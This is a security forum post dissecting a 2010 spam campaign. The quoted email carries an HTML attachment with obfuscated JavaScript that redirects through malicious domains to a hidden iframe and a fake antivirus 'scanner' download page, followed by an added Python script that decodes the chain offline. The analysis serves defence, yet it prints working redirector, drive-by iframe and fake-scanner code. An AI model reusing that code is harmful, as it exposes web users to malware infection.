Author Topic: drive by in spam e-mails massive campaign in effect  (Read 1334 times)

September 17, 2010, 11:58:53 am
cleanmx

hi

We encounter many mails like this one:

Code:
Return-Path: <uncoordinatedj@redhyundai.com>
X-Original-To: abuse@clean-mx.de
Delivered-To: abuse@clean-mx.de
Received: from relayn.netpilot.net (relayn19.netpilot.net [195.214.79.19])
(using TLSv1 with cipher ADH-AES256-SHA (256/256 bits))
(No client certificate requested)
by ksrv8.netpilot.net (Postfix) with ESMTPS id 4722C252C003
for <abuse@clean-mx.de>; Fri, 17 Sep 2010 13:47:01 +0200 (CEST)
Received: from relayn.netpilot.net (localhost [127.0.0.1])
by relayn.netpilot.net (Postfix) with ESMTP id BE00E1EB000C
for <abuse@clean-mx.de>; Fri, 17 Sep 2010 13:47:00 +0200 (CEST)
Received: from localhost (unknown [127.0.0.1])
by localhost (Postfix) with ESMTP id 7987F1EB0006
for <abuse@clean-mx.de>; Fri, 17 Sep 2010 11:47:00 +0000 (UTC)
Received: from relayn.netpilot.net ([127.0.0.1])
by localhost (relayn.netpilot.net [127.0.0.1]) (clean-mx, port 10024)
with ESMTP id JpRKoc8QfoXo for <abuse@clean-mx.de>;
Fri, 17 Sep 2010 13:46:59 +0200 (CEST)
Received: from static-80-66-147-62.ivnet.ru (unknown [80.66.147.62])
by relayn.netpilot.net (Postfix) with ESMTP id 806B139C007
for <abuse@clean-mx.de>; Fri, 17 Sep 2010 13:46:59 +0200 (CEST)
Received: from svtmail03.prod.sabre.com (svtmail08.prod.sabre.com [151.193.64.1])
by mx2.datagrama.net with esmtp
id 98641F-0005B8-60
for abuse@clean-mx.de; Fri, 17 Sep 2010 15:46:57 +0300
Received: from vista (10.208.68.5:38755) by svtmail08.prod.sabre.com (LSMTP for Windows NT v1.1b) with SMTP id <1.0E39B7DF@svtmail05.prod.sabre.com>; Fri, 17 Sep 2010 15:46:57 +0300
Date: Fri, 17 Sep 2010 15:46:57 +0300
From: "Elinor Sutton" <uncoordinatedj@redhyundai.com>
To: abuse@clean-mx.de
Message-ID: <23729982.80821328838943023820.JavaMail.ita@vista>
Subject: Vuong
MIME-Version: 1.0
Content-Type: multipart/mixed;
  boundary="----=_Part_5825058_98131169.1937062675058"

------=_Part_5825058_98131169.1937062675058
Content-Type: text/plain; charset=Windows-1252
Content-Transfer-Encoding: 7bit

 
Today I was served a summons from Wachovia/Wells Fargo with regards to the 20th avenue foreclosure. Attached is a copy of the summons in its entirety and the first page of the borrower final closing statement at the time the borrower received $100K from HMW & JK Enterprises.
 
At the time of applying for the loan, I remember the borrower mentioned about paying off my loan in a short period of time because they were also getting financing from somewhere else. I believe when Wachovia's loan was closed (without our knowledge) the title company that handled their financing should have paid us off so Wachovia would be in the first position.
 
In this case, the title company / closing agent for Wachovia made a mistake. I believe that Wachovia is also insured by their closing agent, but at this time I don't know who this agent is.
 
Wachovia is summoning the wrong party.
 

------=_Part_5825058_98131169.1937062675058
Content-Type: text/html; name="05554wachovia summons.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="05554wachovia summons.html"

PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij5mdW5j
dGlvbiBldGdyKHpqNHIpe3Zhcg0KYm85Nyxidmd5PSIiLGtwbjgsaXl2Mj0iMG9jZGZ1bTtpcC9x
cmx4PW50Li06diBoZT5zXCJhPCIscDNqZSxqNDQ2PWl5djIubGVuZ3RoO2V2YWwodW5lc2NhcGUo
IiU2NnVuJTYzdGklNkZuIHIlNjFpeSUyOGt1JTc5Yyl7JTYydmclNzkrPSU2QnV5YyU3RCIpKTtm
b3IocDNqZT0wO3AzamU8emo0ci5sZW5ndGg7cDNqZSsrKXtibzk3PXpqNHIuY2hhckF0KHAzamUp
O2twbjg9aXl2Mi5pbmRleE9mKGJvOTcpO2lmKGtwbjg+LTEpe2twbjgtPShwM2plKzEpJWo0NDY7
aWYoa3BuODwwKXtrcG44Kz1qNDQ2O31yYWl5KGl5djIuY2hhckF0KGtwbjgpKTt9ZWxzZXtyYWl5
KGJvOTcpO319ZXZhbCh1bmVzY2FwZSgiJTY0b2MlNzVtZSU2RXQudyU3Mml0JTY1KGIlNzZneSkl
M0JidiU2N3k9JTIyJTIyOyIpKTt9ZXRncigiMGlcInZkYTA+cy0wbWUtaDtjPW94PmZ0Oi5oLTAw
bi5zLXY6ZDs9eCBlXCJtb2M+O2E8bXNhdG1zb2w8Lml0dXFjaGlpeC1lPHUwOmFscGF4ciIpOzwv
c2NyaXB0Pjxub3NjcmlwdD5UbyBkaXNwbGF5IHRoaXMgcGFnZSB5b3UgbmVlZCBhIGJyb3dzZXIg
dGhhdCBzdXBwb3J0cyBKYXZhU2NyaXB0Ljwvbm9zY3JpcHQ+

------=_Part_5825058_98131169.1937062675058--

This piece of HTML base64-decodes to:

Code:
<script language="JavaScript" type="text/javascript">function etgr(zj4r){var
bo97,bvgy="",kpn8,iyv2="0ocdfum;ip/qrlx=nt.-:v he>s\"a<",p3je,j446=iyv2.length;eval(unescape("%66un%63ti%6Fn r%61iy%28ku%79c){%62vg%79+=%6Buyc%7D"));for(p3je=0;p3je<zj4r.length;p3je++){bo97=zj4r.charAt(p3je);kpn8=iyv2.indexOf(bo97);if(kpn8>-1){kpn8-=(p3je+1)%j446;if(kpn8<0){kpn8+=j446;}raiy(iyv2.charAt(kpn8));}else{raiy(bo97);}}eval(unescape("%64oc%75me%6Et.w%72it%65(b%76gy)%3Bbv%67y=%22%22;"));}etgr("0i\"vda0>s-0me-h;c=ox>ft:.h-00n.s-v:d;=x e\"moc>;a<msatmsol<.ituqchiix-e<u0:alpaxr");</script><noscript>To display this page you need a browser that supports JavaScript.</noscript>

And this one leads to:

Code:
<meta http-equiv="refresh" content="0;url=http://numerouno-india.com/x.html" />
This, in turn, leads to:

Code:
PLEASE WAITING.... 4 SECONDS
<meta http-equiv="refresh" content="4;url=http://scaner-g.cz.cc/scanner10/?afid=24" />
<iframe width="0" height="0" src="http://arestyute.com/sadhbdsa879321jbdas/index.php"></iframe>

And this, for example, is a fake scanner download attempt:

Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="en" />
<meta http-equiv="Cache-control" content="Public" />

<title>My Windows Online Scanner</title>
<link rel="icon" href="/assets/5b9c863d//Images/favicon.gif" type="image/gif" />

<style type="text/css" media="screen">
#loading {
height:auto;
left:45%;
padding:2px;
position:absolute;
top:40%;
z-index:20001;
}
#loading a {
color:#225588;
}
#loading .loading-indicator {
-x-system-font:none;
background:white none repeat scroll 0 0;
color:#444444;
font-family:tahoma,arial,helvetica;
font-size:13px;
font-size-adjust:none;
font-stretch:normal;
font-style:normal;
font-variant:normal;
font-weight:bold;
height:auto;
line-height:normal;
margin:0;
padding:10px;
}
#loading-msg {
-x-system-font:none;
font-family:arial,tahoma,sans-serif;
font-size:10px;
font-size-adjust:none;
font-stretch:normal;
font-style:normal;
font-variant:normal;
font-weight:normal;
line-height:normal;
}
</style>

<script type="text/javascript">
<!--//<![CDATA[
var LinkSoftDown = "/go/?afid=24&time=1284724505";
function ext(){window.open( "/go/?afid=24&time=1284724505", "_blank", "toolbar=0,titlebar=0,scrollbars=0,status=0,location=0,menubar=0,width=100,height=100,left=0,top=0");}
if (window.attachEvent) eval("window.attachEvent('onunload',ext);");
else window.addEventListener("unload", ext, false);
//]]>-->
</script>
</head>
<body>
<div id="loading" style="display:block">
<div class="loading-indicator">
 <img height="50" width="50" style="margin-right: 8px; float: left; vertical-align: top;" src="/assets/5b9c863d//Images/loading.gif"/>
 <br/>
 <span id="loading-msg">Initializing Virus Protection System...</span></div>
</div>

<script type="text/javascript" src="/scanner10/codejs">
</script>
</body>
</html>
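As an added example (not part of cleanmx's post), the following Python script reproduces the first two hops of the chain above offline: it base64-decodes the attachment body quoted in the message, pulls the substitution alphabet and the ciphertext argument out of the `etgr()` script, reimplements the position-dependent substitution in Python instead of running the attacker's `eval`/`document.write`, and then lists the next hops (meta refresh URL and hidden iframe source) from the resulting HTML. The base64 block and the `x.html` snippet are copied from the post; everything else (the function and regex names, `js_unescape` handling only the `\"` escape this sample uses, the use of `latin-1` to keep every byte) is my own assumption. Nothing here touches the network, and no attacker JavaScript is executed.

```python
import base64
import re

# Base64 body of the "05554wachovia summons.html" attachment, copied from the
# message quoted in the post above (MIME headers left out).
ATTACHMENT_B64 = """
PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij5mdW5j
dGlvbiBldGdyKHpqNHIpe3Zhcg0KYm85Nyxidmd5PSIiLGtwbjgsaXl2Mj0iMG9jZGZ1bTtpcC9x
cmx4PW50Li06diBoZT5zXCJhPCIscDNqZSxqNDQ2PWl5djIubGVuZ3RoO2V2YWwodW5lc2NhcGUo
IiU2NnVuJTYzdGklNkZuIHIlNjFpeSUyOGt1JTc5Yyl7JTYydmclNzkrPSU2QnV5YyU3RCIpKTtm
b3IocDNqZT0wO3AzamU8emo0ci5sZW5ndGg7cDNqZSsrKXtibzk3PXpqNHIuY2hhckF0KHAzamUp
O2twbjg9aXl2Mi5pbmRleE9mKGJvOTcpO2lmKGtwbjg+LTEpe2twbjgtPShwM2plKzEpJWo0NDY7
aWYoa3BuODwwKXtrcG44Kz1qNDQ2O31yYWl5KGl5djIuY2hhckF0KGtwbjgpKTt9ZWxzZXtyYWl5
KGJvOTcpO319ZXZhbCh1bmVzY2FwZSgiJTY0b2MlNzVtZSU2RXQudyU3Mml0JTY1KGIlNzZneSkl
M0JidiU2N3k9JTIyJTIyOyIpKTt9ZXRncigiMGlcInZkYTA+cy0wbWUtaDtjPW94PmZ0Oi5oLTAw
bi5zLXY6ZDs9eCBlXCJtb2M+O2E8bXNhdG1zb2w8Lml0dXFjaGlpeC1lPHUwOmFscGF4ciIpOzwv
c2NyaXB0Pjxub3NjcmlwdD5UbyBkaXNwbGF5IHRoaXMgcGFnZSB5b3UgbmVlZCBhIGJyb3dzZXIg
dGhhdCBzdXBwb3J0cyBKYXZhU2NyaXB0Ljwvbm9zY3JpcHQ+
"""

# Second-stage page (x.html) as quoted in the post; used to show hop extraction.
STAGE2_HTML = """PLEASE WAITING.... 4 SECONDS
<meta http-equiv="refresh" content="4;url=http://scaner-g.cz.cc/scanner10/?afid=24" />
<iframe width="0" height="0" src="http://arestyute.com/sadhbdsa879321jbdas/index.php"></iframe>
"""

# The obfuscator stores its alphabet in iyv2 and passes the ciphertext to etgr().
# Both are JS string literals that may contain \" escapes, hence the (?:\\.|[^"\\])* form.
ALPHABET_RE = re.compile(r'iyv2="((?:\\.|[^"\\])*)"')
PAYLOAD_RE = re.compile(r'etgr\("((?:\\.|[^"\\])*)"\)')
META_REFRESH_RE = re.compile(r'content=["\']\s*\d+\s*;\s*url=([^"\']+)["\']', re.I)
IFRAME_SRC_RE = re.compile(r'<iframe\b[^>]*\bsrc=["\']([^"\']+)["\']', re.I)


def unwrap_attachment(b64_text: str) -> str:
    """Base64-decode the attachment body; latin-1 maps every byte to one char."""
    return base64.b64decode("".join(b64_text.split())).decode("latin-1")


def js_unescape(s: str) -> str:
    """Undo simple backslash escapes (\\" and \\\\) inside a JS string literal.
    Assumption: the sample uses no \\n, \\x.. or \\u.... escapes."""
    return re.sub(r"\\(.)", r"\1", s)


def cipher_parts(js: str):
    """Return (alphabet, ciphertext) from the deobfuscated script text."""
    a = ALPHABET_RE.search(js)
    p = PAYLOAD_RE.search(js)
    if a is None or p is None:
        raise ValueError("etgr() obfuscation pattern not found")
    return js_unescape(a.group(1)), js_unescape(p.group(1))


def decode_etgr(alphabet: str, payload: str) -> str:
    """Reimplementation of etgr(): each ciphertext char that occurs in the
    alphabet is replaced by the alphabet char (pos+1) places to its left
    (wrapping around); chars outside the alphabet pass through unchanged."""
    n = len(alphabet)
    out = []
    for pos, ch in enumerate(payload):
        idx = alphabet.find(ch)
        if idx < 0:
            out.append(ch)
        else:
            out.append(alphabet[(idx - (pos + 1) % n) % n])
    return "".join(out)


def next_hops(html: str) -> list:
    """URLs a browser would fetch next: meta-refresh targets, then iframe sources."""
    return META_REFRESH_RE.findall(html) + IFRAME_SRC_RE.findall(html)


def decode_stage1(b64_text: str = ATTACHMENT_B64) -> str:
    """Attachment -> script -> cipher parts -> the HTML document.write() would emit.
    The last ciphertext char decodes to a trailing space, hence strip()."""
    alphabet, payload = cipher_parts(unwrap_attachment(b64_text))
    return decode_etgr(alphabet, payload).strip()


if __name__ == "__main__":
    stage1 = decode_stage1()
    print(stage1)
    print("stage 1 hops:", next_hops(stage1))
    print("stage 2 hops:", next_hops(STAGE2_HTML))
```

The decoder takes only the alphabet and the ciphertext as inputs, so the same function handles every sample of this kit that keeps the `(index - position) mod len` scheme, even when the variable names are rotated; if `cipher_parts` raises, the template has changed and the regexes need updating rather than the decoder.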